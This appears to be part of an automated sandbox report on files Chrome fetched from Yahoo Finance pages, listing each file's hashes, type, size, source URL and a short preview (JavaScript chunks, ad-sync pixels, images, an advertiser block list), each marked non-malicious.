                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:DEMYCIbB4pEx9PgdbToC7MQ+iIo2EBOCoSMgaQME/eYNPLy3zRhH2Qv/H+hf2COW:gMbIbB4pEx9Pg17MQ+iIo2EBOCoSMgaG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FF8039AAC72DA3FC83FBA1B284BAA45
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:040E20D71BDCA7AB88AA543178770C55020ED33B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:BF4698D774243337F18C174D8551304E8618ECCE825AADB7E9671BDD56EC5A50
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D11081C236AB2C31CFE286BA293E0586EECE7B3ED6872EBAE74C56DC0E40FE7DE24F9D000C04EE19F516F0E273AFE8645325400ECABA68429513732EF8ADFC9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/eh/prebid-config/bp-finance.json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{. "brandProtection": {. "badv": {. "1111.com.tw": true,. "1keygou.com": true,. "3oaksorchard.com": true,. "43cbd.com": true,. "4everstamp.com": true,. "aax.com": true,. "abloodsugaroption.com": true,. "abra.com": true,. "accessmediaportal.com": true,. "acebarry.com": true,. "acticatin.com": true,. "actiongamesplace.com": true,. "actualitateavranceana.ro": true,. "adameve.com": true,. "adblocker.vpnwelt.com": true,. "aditore.com": true,. "adlock.com": true,. "adpushup.com": true,. "adremover.com": true,. "adremover.org": true,. "adrenal.ru": true,. "adriangadea.ro": true,. "adrianvigheciu.ro": true,. "adroll.com": true,. "ads.google.com": true,. "ads.sharebeast.com": true,. "adsterra.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (8986)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.452805036573083
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:SEBXFCJ6EIoA1R8RnQU0fIBIAdWo2WPcHSj7AdxHwz5iPA:la6EAR8Rn90w+ArP0mCxG1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:290EA37CB82747C5F692439F5E191BAD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F2C4814530DE65C81252392AB404BDAF3B6C857B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EE4016EEEA8C075D1B82B3CA53E2FE6BF0A75151ABDBED658207338DB379DF0B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:00AB3AE10D7E88B77F0313F7E35D86666545251FDAF0B8E6C00CC491CA99FF2C57523F96487CBCD819D2DC2F167D2012E32199E9DF4245998689B3F1E7A54B6F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Z,e as P,d as M,f as N,i as p,q as D,L as X,k as T,I as ne,c as le,b as F,j as V,l as C,u as oe,g as ie,a as se,Q as ae,t as R,h as q,a7 as re,a1 as fe,m as ce,o as ue,n as G}from"./scheduler.Dsuh-FKt.js";import{S as J,i as K,t as E,g as W,a as v,e as Y,c as H,b as U,m as j,d as z}from"./index.CvwOawEI.js";import{B as Q}from"./Button.C2rixdaC.js";import{C as de}from"./close.C3ug6nNR.js";import{t as L,d as me,h as _e,c as he,Z as x,g as ge,e as be,an as pe}from"./commonUtil.BWwawKjd.js";import Ee from"./ErrorMsg.Cn69Klh6.js";import{S as ve}from"./Spinner.D9ew0_W4.js";import{l as $,f as ke}from"./logUtil.CCV3qKPL.js";import{l as Ce,u as De}from"./updatePortfolioChartStore.DhAdR_DV.js";import{l as Le}from"./loadPortfolios.CP0EWCgJ.js";import"./PortfolioSymbolCount.svelte_svelte_type_style_lang.n39zXuiY.js";function ee(l){let e,n,t;const o=l[13].default,i=le(o,l,l[12],null),r=i||Oe();let s=l[2]&&te(l);return{c(){e=P("section"),r&&r.c(),n=F(),s&&s.c(),this.h()},l(f){e=M(f,"SECTI
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11842
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.986151898886652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:9z3FQDnz4o51KnUED1lWM6TZvFdkXQf7l9SpuPm5yQ33E3cUqQG2OEhKJxzVH:9zaXnqB1Q7TZtdk47SpuPm5x3jOG2OEM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:078E319BEBF44A78D00F2B1C413AA3A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:5C7466E54BECFF6A375973FDA1E3980FF94013DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C86B702F2491EE510713F919B7E8D491B2B1504F67BBB74F87080551CFAF9D7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:50F9E1AC2053BA555872B051F900F1FB6A298CCF78A48A5683D03051354B2921D4AA8E90881C28E19ED289C38A5E438B4347789CD3B091D73B505AF62BAADC58
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/EP05qSSZkDRwnsJtEV.Bmw--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/84608c70-7f17-11ef-bfc7-ce05e04ea18c.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF:...WEBPVP8 .........*d...>y4.H...!(......c......y7..Wx;..~./..O^U..>..|.g..9+....!f...../."x.E..._4_...t..c.un.:6..y._m.o...?k..>cY..c.......w.l*`..R0.=...[,...\%..!c[.j.K...$h?..._.:..L......`1h....u.p.O.......k..V.3...A..f.z<.w.....,.-.%.Q.....u.}....yV...a#.v.......&.x....2KY..-.i...OH...U...(..2l\.e......u...f....`Uz....H.:.A.;#.|.....i.1[...6.4..L1.MI.b..W.. 7...+.j[|.....F..h....<+s....#...u..[..e4....S.k..6....M..W^..D...Qm.......C.....H.AN.|.....$f..X.e..X^..?...)n1..oJK.-..(s.VV..7..!.x.$....X..;61....i...36..vfU..Uw.....<..2&.f:.F..... ./D...=....`E.kF..?.X.D....X..:....7V.d.......F4.E.......lw.nV..C....5..*....K)oU....N...U..{..G...3c..%.D..v.8H.....G.[.........O".2K../..C.X...z..2."%.O..0sm.1dq&.S..=g...m.(7L%..km..)....^....l..0/..J<.....wO..xs`~.q.-......`..........w..C...d.g..1....!..|..?.....'...=/.F.{....)#wW......s.@..jyAg..&....."..-.LF.kG.....IR.C.]Q...._...Fy..../.......5.4.g.l4.>i W..=.`.W..I]..$..W.....
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):24899
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.487168832269248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:iJZSCN7ECDA6mlYbYz+WBiLoj7zRSmZM4NCfobnudUbDVxzcz89YQ9ZGWhTh:iJDN4CDIwqBbZeAGWhTh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2A4E43326A158B47D0598571FD4099B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D362579466C837C29199DB3D25A5D22490A69F02
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:937085B9310AF935B47F756A6326F86351C9FA0066DE9E313E8CD6623CA0F888
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E93F57F74B0A15FD0833E5721038FC5C042F68B7612C20E4DCB12007F25EB2E7935AAE5245789A91A06D7EF93531C4CE3BC3CE02777DF33CA5643424F67AB673
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://static-cdn.spot.im/production/icons/sprites/sprite.svg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><symbol viewBox="0 0 384 512" id="arrow-up"> ! Font Awesome Pro 6.4.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license (Commercial License) Copyright 2023 Fonticons, Inc.--><path d="M214.6 41.4c-12.5-12.5-32.8-12.5-45.3 0l-160 160c-12.5 12.5-12.5 32.8 0 45.3s32.8 12.5 45.3 0L160 141.2V448c0 17.7 14.3 32 32 32s32-14.3 32-32V141.2l105.4 105.4c12.5 12.5 32.8 12.5 45.3 0s12.5-32.8 0-45.3l-160-160z" /></symbol><symbol viewBox="0 0 16 16" id="arrows-repeat"><path d="M16 7.984c0-.817-.219-1.633-.563-2.351-.218-.457-.812-.555-1.187-.196l-.375.424a.775.775 0 0 0-.156.85c.187.391.281.848.281 1.273 0 1.73-1.375 3.134-3 3.134H5.312l1.063-1.045a.804.804 0 0 0 .031-1.11l-.343-.359c-.313-.326-.782-.326-1.063 0l-2.906 3.037a.794.794 0 0 0 0 1.077L5 15.755c.281.327.75.327 1.063 0l.343-.36a.804.804 0 0 0-.031-1.11l-1.063-1.077H11c2.75 0 5-2.318 5-5.224ZM2.25 9.29C2.062 8.898 2 8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1649), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1649
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.546331149007552
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:jvMoVTSeAdPMNMqjVUaseOSCy9AHVGBjMdgX0Bw1kM5zW4ld:j0uAUiqjuasedCKAHVGaa0BcV5t3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B1ADE37ECCA58999106D91174FAC2112
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C1FDDA850E415FA57257B767D4318240043FBD6B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9D823CB404323CDA1C76F78E28B99619373BA2D5FD571F595BB349EA9938A3E7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:76C668888F14E6EDA9E92013B71F786BA5CC21DC78EE779DF0D39ADA95A671C75D6EFF1934F1446FC5883A117BA26C5840C36A33E64B3C23DAD9E1E195677BE6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:PubMatic.loadAsyncIframePixel('https://cms.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?idmatch=0&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://x.bidswitch.net/sync?ssp=pubmatic&gdpr=0&gdpr_consent=&us_privacy=#US_PRIVACY');PubMatic.loadAsyncImagePixel('https://pubmatic-match.dotomi.com/match/bounce/current?networkId=17100&version=1&nuid=176682A8-E121-44A7-818D-4FE53D542BB2&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://sync.srv.stackadapt.com/sync?nid=11&gdpr=0&gdpr_consent=');PubMatic.loadAsyncIframePixel('https://dsp-ap.eskimi.com/pixelGet?ex=50&gdpr={gdpr}&gdpr_consent={gdpr_consent}&dest=https://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM3MDcmdGw9MjAxNjA=&piggybackCookie={dmp_id}&gdpr={gdpr}&gdpr_consent={gdpr_consent}');PubMatic.loadAsyncIframePixel('https://p.rfihub.com/cm?pub=224&in=1&getuid=https%3A//image2.pubmatic.com/AdServer/Pug%3Fvcode%3Dbz0yJnR5cGU9MSZjb2RlPTI3MzkmdGw9MTI5NjAw%26piggybackCookie%3D%24UID%26gdpr%3D0%26gdpr_cons
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (814)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):815
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.175079001514799
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:irHv7SvxwVMPeE2bJdgKLZIuxS2sT1bakGqrtgeGo9ZsV:ibvegBda6yBmeV8V
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:93AA719022B67645D571174D77D7E316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FF6CEB501CAD81712FB5AEF8EF5CD12F0248D791
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7FD6082CFF9CDCD95D88BB38AB952B1B66CFC392E2EFF188C7AB19398BC64E51
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:63BF579C982352F182EFEA6010BA333DF5816CA3029BFD601920706F80A558CCBC9C86B855E55D1F4F96C9281780D0BE6C6E3F0D2F0A5D6AF050451F1CE48C89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/loadPreferences.n2i1qBq4.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{c as d,d as p}from"./commonUtil.BWwawKjd.js";import{f as m,l as w}from"./logUtil.CCV3qKPL.js";async function v(r,{path:n,reuse:f=!0,silent:g=!1}={}){var c,t;const[o]=await d(["experience"],r),a=await p(r);if(f){const e=o.getRegionData("dock");if(e)return e}try{const e=a.ynet==="1",l=(((c=r.url)==null?void 0:c.searchParams)||new URL(window.location.href).searchParams).get("expPreview"),u={product:"financeWeb",lang:a.lang,region:a.region,...n&&{path:n},...e&&l&&{preview:l}},s=await m(r,{isRelative:!0,pathname:"/xhr/experience",perfLabel:"loadPreferences",query:u},{credentials:"include"}),i=(t=s==null?void 0:s.container)==null?void 0:t.regions;return!g&&i&&o.loadExperience(i),i}catch(e){if(n&&n==="subscription-pricing")throw e;return w(r,{},{data:e,perfLabel:"loadPreferences"}),null}}export{v as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 356x180, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):27433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.970347116029154
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:h2YOZGUAniCcloWXl0zYr+4sISKi0gwG/9INwtL5i:h5G7tzoalX7BCdV/9wwtti
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9980F8DA7DC2712B315ED9CE0DDD3F6D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9F899B1DE4FA5D84CEABB05F15AAE8D62DAA24EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B7DAB17CAF2CC59E0C763EAC0751B055E039081A6B7584C6DB9686718AF1DA4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D9D1E7B0BB285BC8A0B4F281F0574635495B659F867A2176CDA7C7B91B0FD4D638A2C9B8E13B50FDAF23E599287743E2C0AC67563B224D179888E7A0AD2F513E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C.........................................................................d............................................M..........................!..1A"Qa.2q....#B.R...$3b.....Cr...%45Sc....&6Td.................................1.......................!..1..A"#Q2B..3Cab$qRr..............?......L.....|u.s...u...R....D..E..J$&..q..1.B...(oU...a%g.....M.=1.....cX..wU..Y.a.j.mlJ...j[.~...2.W...`...ul,-....-.J.6...F.?...N u.P.vy..l.h..t....Gxl..|b......?8.....og.../.t..c... x..`.~.m.....kY...g.Lr.R..Onx....Vo....o....A.....gx.<...J`..A.b.K..r..Eb..*{....M.I.i..{o.|.k.d,."..z.....K.]l...P;y......].j.B}.x+.8.h..8.r/-.....T...P...iQ.pm..zm%....Jql..x...Q..+.V...v.Xo.8..,..d...3..mUl..n7....j.V..L[...l0,$..T.|Nc....H8.(.Ky...[..~....6..Gt*`...T..[.../.M...Y.5.WBM...AB...]4..$+U..)Y..\..;...$\..&...;*B.-\t..A.L......<.(.Ro......m!......o.^.J."C.]zEENF.........F.\......[..M.9..j..}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0950611313667666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s0.2mdn.net/dot.gif?gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 536x284, components 3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):32733
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.976517072227835
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:PNRYWBq7gCGWpm9d9AEBHBgHl+Iy5EFIvGbfA0HDrHuBB:/9qSWq9AmH+HlTFIv6AQeB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CEE7BACB07B9791F8162B11CA18E8A67
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2CEF85A37764638E6AD1861B8E9DC89A6F2A4ACA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:DF35DFA2D5B7EB68790CA08D8790D0BCDC847E34165959D7907FF3971E26939B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:6D3B6D8F1007FC4BBBF11729795097FC064B2DF3CD4287C91F71DBAA9F2CDD53052C0CBE650A4D55C87413C13DF7D0CE0F0A590FF00501219AB8438DF308FA87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C......................................................................................................................H..........................!1A..Qa"q..2B....#R..b....$Cr3..%4cs....&DT........................................................!..1...A"Q..#2.$3B4Caq............?...e.....I.@+g...-...u[V...d..n.M...$...E+ .h4.....hm.&....6&.88....bs.6j.[...{...dg..]...a^.y..j.5.W>O.....@...N..5....j).w].<..=..k.7D.W..f....I.d...;...SvU.g.......H..n....!..N.xun.v..=..FOe..T......).!.UvCM...1b.u.f....$.ZXa........E.6....).x...kEL....g.....z."{2....e...d|l.....U8.....j.1.!...]..........C|....M...T.]..........D>....K=...n`..v....$~..QoTI.MW%Mt.I..4e..2.K......%..JME,od..Z.....\...p].....7su....l...........}J......t..C?.....E..I...}.Ev..o.5........](.c.vbx.,....o........oE2.....F?Ul...8x'.7..\........k.......D.....y......4p..V.......t...#h...}...}.\6.m.Ep..}.}(....%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (52965)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):53065
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.287566227073703
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:wel24obn7/HtZDf9MoD9ona5y5uVTAGAzyzC8:D1In7/HtZhXD9onw5bAezC8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:CDE9A77058C077F45CD4C6D0DF36AC70
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:40B8BE61F2D501D06E3367E562923FB7BDFCE7D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F7D53FC843FEF16B69F2FD332C89A6B92207A944ED68F7C27411D9946358A82C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1222A3484419D4328D307784E1004BF4B36F12C48D750659E7E95B211CD4BF4AC31767BA199CB2FCE3E086FCF865D6B4EC47157AF32A25F7ADED035AE326799B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see common-60a025ce.2db2c45d4d038eecd19e.js.LICENSE.txt */."use strict";(self.webpackChunk_vzmi_finance_cosaic=self.webpackChunk_vzmi_finance_cosaic||[]).push([[7023],{1414:(e,t,a)=>{var i=a(4603);function r(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);t&&(i=i.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),a.push.apply(a,i)}return a}function n(e){for(var t=1;t<arguments.length;t++){var a=null!=arguments[t]?arguments[t]:{};t%2?r(Object(a),!0).forEach((function(t){s(e,t,a[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):r(Object(a)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(a,t))}))}return e}function s(e,t,a){return(t=function(e){var t=function(e,t){if("object"!=typeof e||!e)return e;var a=e[Symbol.toPrimitive];if(void 0!==a){var i=a.call(e,t||"default");if("object"!=typeof i)retur
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (15896), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15896
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.503616373683869
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GGJ01yJn5yOIVmxV/ZUN/4hDEwu85wWoJNmpPvIE:GGJ00JngOCyZ+8l2Wush
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C73E0CB111244BC0796DA0E83348068B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C83D2843508D6BA4827C2DCA0670FFBDD4F1E4ED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9913C1ABBE147B7CC94C91FBE26B22D24F72B98F4DA5514D376A473B3D10ACD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9DF2085B42D146263164156B483EFEBB829DD49434591A2F511A4DE31E69A469DB4612C200382A9CABE10F11A3C5C52EB89AC7590F02149367BB144AC65E6CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://ads.pubmatic.com/AdServer/js/user_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&predirect=https%3A%2F%2Fpbs.yahoo.com%2Fsetuid%3Fbidder%3Dpubmatic%26gdpr%3D0%26gdpr_consent%3D%26gpp%3DDBAA%26gpp_sid%3D-1%26f%3Db%26uid%3D
